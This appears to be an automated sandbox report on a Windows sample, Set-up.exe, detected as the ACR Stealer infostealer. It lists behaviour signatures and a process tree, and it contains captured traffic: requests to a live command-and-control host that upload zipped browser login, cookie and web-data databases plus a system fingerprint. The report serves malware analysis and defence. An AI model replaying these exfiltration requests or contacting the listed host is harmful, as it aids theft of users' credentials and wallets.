Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1686586
Has dependencies:false
MD5:93704dcb189997351ec039c6e5f1aa41
SHA1:d1bcc20f331f881d46cae1a13b281c127d9d6ae0
SHA256:6be08c94108deb529fc50d4fd76c1a71e4a1329cbc618d550dccde597dc4f09e
Tags:de-pumpedexeuser-abuse_ch
Infos:

Detection

ACR Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected ACR Stealer
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal from password manager
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Set-up.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 93704DCB189997351EC039C6E5F1AA41)
    • chrome.exe (PID: 7228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • WerFault.exe (PID: 7416 cmdline: C:\Windows\system32\WerFault.exe -u -p 7260 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 1976 cmdline: C:\Windows\system32\WerFault.exe -u -p 7260 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • chrome.exe (PID: 3888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • WerFault.exe (PID: 2288 cmdline: C:\Windows\system32\WerFault.exe -u -p 3888 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 2224 cmdline: C:\Windows\system32\WerFault.exe -u -p 3888 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • chrome.exe (PID: 1692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • WerFault.exe (PID: 5936 cmdline: C:\Windows\system32\WerFault.exe -u -p 1692 -s 140 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 1004 cmdline: C:\Windows\system32\WerFault.exe -u -p 1692 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Set-up.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1236851204.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Set-up.exe PID: 7572JoeSecurity_ACRStealerYara detected ACR StealerJoe Security
          Process Memory Space: Set-up.exe PID: 7572JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-05-10T08:05:35.760443+020020526741A Network Trojan was detected192.168.2.449721188.114.96.380TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://mcrsftuptade.pro/UpAvira URL Cloud: Label: malware
            Source: http://mcrsftuptade.pro/Up/gAvira URL Cloud: Label: malware
            Source: http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371Avira URL Cloud: Label: malware
            Source: http://mcrsftuptade.pro/Up/pAvira URL Cloud: Label: malware
            Source: http://mcrsftuptade.pro/Up/bAvira URL Cloud: Label: malware
            Source: Submited SampleNeural Call Log Analysis: 83.3%
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_03F82F00 LoadLibraryA,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,CryptUnprotectData,FreeLibrary,FreeLibrary,FreeLibrary,0_2_03F82F00
            Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DEBUG_STRIPPED, BYTES_REVERSED_HI

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.4:49721 -> 188.114.96.3:80
            Source: global trafficHTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close
            Source: global trafficHTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 289Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 4e 27 f4 29 6f 00 00 00 6f 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 47 41 53 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 4e 27 f4 29 6f 00 00 00 6f 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b5 00 00 00 00 00 Data Ascii: PK\d!RN')oo(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857132929e146be9-c76a-4720-bcdb-53011b87bd06","bt":"GAS","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!RN')oo(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
            Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 41649Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 c3 94 76 3c 00 a0 00 00 00 a0 00 00 11 00 00 00 62 2f 63 38 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 7a 70 05 00 00 00 01 07 fb 00 00 00 00 0d 07 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524940Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 41643Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 af 7d e8 83 00 a0 00 00 00 a0 00 00 0e 00 00 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 13 00 00 00 0a 00 00 00 0a 00 00 00 03 00 00 00 17 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 2e 7a 70 0d 0d 18 00 04 09 f1 00 0f 67 0f cf 0a ae 09 f1 09 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 623250Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: POST /Up/p HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 485Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 42 19 07 7a 33 01 00 00 33 01 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6f 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 22 2c 22 75 6e 22 3a 22 6a 6f 6e 65 73 22 2c 22 70 22 3a 22 4a 4f 4e 45 53 2d 50 43 22 2c 22 61 22 3a 22 78 36 34 22 2c 22 63 22 3a 34 2c 22 6c 22 3a 22 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 47 41 53 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 64 6e 22 3a 22 6e 75 6c 6c 22 2c 22 64 70 22 3a 22 32 32 32 22 2c 22 73 22 3a 22 31 32 38 30 78 31 30 32 34 22 2c 22 72 22 3a 34 30 39 35 2c 22 65 6c 22 3a 66 61 6c 73 65 2c 22 6c 74 22 3a 22 6e 75 6c 6c 22 2c 22 69 73 22 3a 5b 5d 2c 22 6c 69 22 3a 5b 5d 2c 22 70 6c 22 3a 5b 5d 2c 22 67 22 3a 5b 22 4d 69 63 72 6f 73 6f 66 74 20 42 61 73 69 63 20 44 69 73 70 6c 61 79 20 41 64 61 70 74 65 72 22 5d 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 42 19 07 7a 33 01 00 00 33 01 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 79 01 00 00 00 00 Data Ascii: PK\d!RBz33(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"o":"Windows 10","un":"user","p":"user-PC","a":"x64","c":4,"l":"1746857132929e146be9-c76a-4720-bcdb-53011b87bd06","bt":"GAS","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06","dn":"null","dp":"222","s":"1280x1024","r":4095,"el":false,"lt":"null","is":[],"li":[],"pl":[],"g":["Microsoft Basic Display Adapter"]}PK\d!RBz33(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKVy
            Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 139949Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 74 aa 79 19 00 20 02 00 00 20 02 00 0f 00 00 00 62 2f 63 38 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 06 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 2e 7a 70 05 00 00 00 05 07 e7 00 00 00 00 3c 07 fb 07 f6 07 f1 07 ec 07 e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 